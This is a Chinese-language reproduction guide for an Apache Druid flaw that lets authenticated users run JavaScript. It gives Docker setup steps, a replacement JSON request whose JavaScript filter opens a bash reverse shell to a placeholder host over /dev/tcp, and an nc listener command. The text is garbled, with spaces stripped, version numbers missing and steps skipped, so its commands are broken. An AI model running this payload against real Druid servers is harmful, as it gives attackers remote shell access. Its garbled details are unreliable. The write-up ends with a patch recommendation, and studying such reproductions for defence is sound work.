0x01漏洞概述ApacheDruid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。
0x02影响版本及更早的版本
0x03环境搭建使用docker环境搭建,安装docker后,拉取镜像到本地,拉取命令如下:
dockerpullfokkodriesprong/docker-druid
启动镜像
dockerrun--rm-i-p8888:8888fokkodriesprong/docker-druid
0x04漏洞复现3.在右边填写以下代码
Basedirectory:quickstart/tutorial/Filefilter:
直到Filter时,打开BurpsuitePro进行抓包
替换data数据为
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){().exec('/bin/bash-c$@|bash0echobash-i/dev/tcp/your_ip/666901')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}6.直接反弹shell进行测试,在攻击机上使用nc监听,监听命令如下:
nc-lvp6669
8.成功反弹shell到攻击机。
0x05防护建议建议将Druid升级到最新版本
目前厂商已发布升级补丁以修复漏洞,补丁获取链接